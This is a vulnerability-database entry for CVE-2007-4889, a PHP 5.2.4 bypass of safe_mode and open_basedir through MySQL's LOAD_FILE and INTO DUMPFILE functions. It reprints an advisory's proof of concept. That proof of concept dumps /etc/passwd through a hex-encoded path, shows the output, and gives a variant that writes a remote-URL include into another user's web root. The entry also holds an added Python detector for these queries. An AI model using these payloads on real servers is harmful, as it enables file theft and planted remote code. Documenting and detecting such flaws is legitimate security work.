PHP MySQL Extension Multiple Security Bypass Vulnerabilities

Vulnerability ID: 1189148
Vulnerability type: Unknown
Published: 2007-09-13
Updated: 2007-09-13
CVE ID: CVE-2007-4889
CNNVD-ID: CNNVD-200709-170
Platform: N/A
CVSS score: 6.8
|Vulnerability source
https://www.securityfocus.com/bid/85409
https://cxsecurity.com/issue/WLB-2007090051
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200709-170
|Vulnerability details
The MySQL extension in PHP allows remote attackers to bypass safe_mode and open_basedir restrictions via the MySQL (1) LOAD_FILE, (2) INTO DUMPFILE, and (3) INTO OUTFILE functions.
|Exploit (EXP)
Application: PHP <=5.2.4
Web Site: http://php.net
Platform: unix
Bug: safemode & open_basedir bypass

-------------------------------------------------------

1) Introduction
2) Bug
3) Proof of concept
4) Credits
===========
1) Introduction
===========

"PHP is a widely-used general-purpose scripting language that
is especially suited for Web development and can be embedded into HTML."

======
2) Bug
======
various mysql functions safemode & open_basedir bypass
( LOAD_FILE , INTO DUMPFILE , INTO OUTFILE )
=====
3) Proof of concept
=====
/*
debian:~# php -v
PHP 5.2.4 (cli) (built: Aug 31 2007 16:39:15)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
*/

debian:/test/mysql# ls
debian:/test/mysql#

<?php
mysql_connect("localhost", "granted_user","something");
mysql_query("select load_file(0x2F6574632F706173737764)into dumpfile'/test/123.txt';");
?>

debian:/test/mysql# ls
123.txt
debian:/test/mysql#
debian:/test/mysql# vim 123.txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync

variant : select '<?include("http://site.com/hello.html")?>' into dumpfile '/home/NOT_MY_USER/www/index1.php';

=====
4) Credits & greets
=====

laurent gaffi
laurent.gaffi@gmail.com

greets: Mattias Bengtsson (see http://php.net).
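
A defender-side check for the technique in the advisory above, as an added example that is not part of the original advisory or of PHP/MySQL: it scans SQL statements (for instance from a query log) for the three file constructs the advisory names, decodes hex-literal paths like the one in the proof of concept, and reports paths outside an assumed open_basedir. The function names, the constructed sample queries and the `/var/www/app` base directory are assumptions.

```python
import posixpath
import re

# The three MySQL file constructs named in the advisory.
FILE_OPS = {
    "LOAD_FILE": re.compile(r"\bload_file\s*\(", re.I),
    "INTO DUMPFILE": re.compile(r"\binto\s+dumpfile\b", re.I),
    "INTO OUTFILE": re.compile(r"\binto\s+outfile\b", re.I),
}
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)
QUOTED = re.compile(r"'([^']*)'")

def candidate_paths(sql):
    """Absolute paths in a statement, taken from hex literals and quoted strings."""
    decoded = [bytes.fromhex(h).decode("latin-1") for h in HEX_LITERAL.findall(sql)]
    return [s for s in decoded + QUOTED.findall(sql) if s.startswith("/")]

def outside_basedir(path, basedir):
    """True if the normalised path does not sit under basedir."""
    p, b = posixpath.normpath(path), posixpath.normpath(basedir)
    return not (p == b or p.startswith(b + "/"))

def scan(queries, basedir):
    """Return one finding per statement that uses a file construct."""
    findings = []
    for sql in queries:
        ops = [name for name, rx in FILE_OPS.items() if rx.search(sql)]
        if ops:
            paths = candidate_paths(sql)
            outside = [p for p in paths if outside_basedir(p, basedir)]
            findings.append({"ops": ops, "paths": paths, "outside": outside})
    return findings

# Sample input: the second statement is the advisory's own query,
# the first and third are constructed for this example.
SAMPLE_QUERIES = [
    "SELECT id, name FROM users WHERE id = 7",
    "select load_file(0x2F6574632F706173737764)into dumpfile'/test/123.txt';",
    "SELECT * FROM report INTO OUTFILE '/var/www/app/export/r.csv'",
]

if __name__ == "__main__":
    # "/var/www/app" stands in for the site's open_basedir (assumption).
    for finding in scan(SAMPLE_QUERIES, "/var/www/app"):
        print(finding)
```
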
|Affected products
PHP PHP 5.2.4
|References

Source: BUGTRAQ
Name: 20070911 PHP 5.2.4 <= various mysql functions safemode & open_basedir bypass
Link: http://www.securityfocus.com/archive/1/archive/1/479082/100/0/threaded
Source: XF
Name: php-multiple-functions-security-bypass(36555)
Link: http://xforce.iss.net/xforce/xfdb/36555
Source: BUGTRAQ
Name: 20070912 Re Re: PHP 5.2.4 <= various mysql functions safemode & open_basedir bypass
Link: http://www.securityfocus.com/archive/1/archive/1/479189/100/200/threaded
Source: BUGTRAQ
Name: 20070912 Re: PHP 5.2.4 <= various mysql functions safemode & open_basedir bypass
Link: http://www.securityfocus.com/archive/1/archive/1/479187/100/200/threaded
Source: SREASON
Name: 3134
Link: http://securityreason.com/securityalert/3134